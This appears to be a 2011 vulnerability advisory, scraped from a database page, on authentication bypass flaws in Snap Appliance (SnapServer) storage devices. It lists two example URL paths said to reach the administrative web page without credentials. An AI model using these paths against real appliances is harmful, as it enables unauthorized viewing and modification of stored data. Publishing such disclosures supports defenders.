Lucene search
SecurityvulnsSECURITYVULNS:DOC:25696HistoryFeb 14, 2011 - 12:00 a.m.
Multiple Snap Appliance (SnapServer) Bypass Vulnerabilities
2011-02-1400:00:00
vulners.com
27
Exploit Title: Multiple Snap Appliance (SnapServer) Vulnerabilities
Date: 13-02-2011
Author: SeeMe
Vendor Link: http://www.overlandstorage.com/
Effected Version(s): N/A
Multiple SnapAppliance (SnapServer) suffers from Multi-vulnerabilities which allows unprivileged users to view and modify Storage-Data,
this vulnerability can be exploited via web browser.
The following example URL(s) will allow access to the Storage's main administrative Web page without authentication:
http://127.0.0.1/patch/DataKeeper Backup Of C/Documents and Settings/LocalService/Local Settings/
http://127.0.0.1/common-cgi/shownas